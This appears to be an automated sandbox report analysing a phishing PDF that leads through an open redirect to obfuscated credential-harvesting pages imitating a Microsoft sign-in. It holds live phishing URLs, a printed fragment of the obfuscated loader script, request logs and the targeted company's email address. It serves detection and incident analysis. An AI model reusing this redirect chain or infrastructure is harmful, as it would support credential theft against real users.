Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Appraisal-nation-Review_and_Signature_Request46074.pdf

Overview

General Information

Sample name:Appraisal-nation-Review_and_Signature_Request46074.pdf
Analysis ID:1586844
MD5:0513c541b2989b64dfd5a1a96e064269
SHA1:009a8b46c97704ddcfbe17aad39ebf60d2a60aa7
SHA256:fd50c264c2fde8edb2ca0227f56cb778c5be75af7926437c43ec68790d30b303
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6780 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7000 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6204 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1612,i,11819385348034914370,10990972197126798505,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 1208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 1864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2440,i,14667198300048541513,3180845413884203349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://plasticoscorrea.com.br/script/#Y2xpZW50cmV... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote code, sends user data to an external server, and utilizes heavily obfuscated strings. Additionally, the script appears to be interacting with suspicious domains, further increasing the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and poses a significant security risk.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with an unknown domain 'fx2ZgE2sJQixDZx1WNxR2tfETu7u4EGX5odLHJXARFaqXx9o6nST.gageodeg.ru' further increase the risk. While the script may have some legitimate functionality, such as handling a form submission, the overall behavior is highly suspicious and indicative of potential malicious intent.
Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29tHTTP Parser: (function(_0x4a596b,_0x31a4ff){const _0x590499=_0xaaf2,_0x2b2108=_0x4a596b();while(!![]){try{cons
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 8357efd5-62d7-4f1e-8fd1-958b9613491a9dc6b6b0-9e86-4baa-a8a9-a85689527d40
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29tHTTP Parser: No favicon
Source: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29tHTTP Parser: No favicon
Source: https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@appraisal-nation.comHTTP Parser: No favicon
Source: https://nokixa.qemitorn.ru/yz8E/#Dclientrelations@appraisal-nation.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638720363472410692.ODM1N2VmZDUtNjJkNy00ZjFlLThmZDEtOTU4Yjk2MTM0OTFhOWRjNmI2YjAtOWU4Ni00YmFhLWE4YTktYTg1Njg5NTI3ZDQw&ui_locales=en-US&mkt=en-US&client-request-id=8974ce7e-fd98-40e8-85d8-97d274df8a23&state=2TbO39zcJi3qIKsYxVnXdO0D3fEW5ipKipeWm-1w-lc2fios6AeJIzIoFWM6V_C50eM448kL5S5IwsV0XISMV0D0DRUmOcZ-xp2A0bP9r1K1KSMkFmO6E4KsjYVY6I2veX_RIwwBGroUUSnA0OAhHk0tVl9aQ389Aqha1iNQoz3P6JafQaDFz_W2jvt1tG2lCxvzA8uF76Ztm6m6B1XogBooA5W32KmUHTkwMIuydh2ZxDG9eHvKcHOV-Dc8VVlxDoGOvelinsJMKpZ6GvArxQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t HTTP/1.1Host: www.teleboario.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script/ HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script/disk/slidercaptcha.css HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /script/disk/longbow.slidercaptcha.js HTTP/1.1Host: plasticoscorrea.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://plasticoscorrea.com.br/script/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
Source: global trafficHTTP traffic detected: GET /280/155/?image=3 HTTP/1.1Host: picsum.photosConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://plasticoscorrea.com.brsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://plasticoscorrea.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
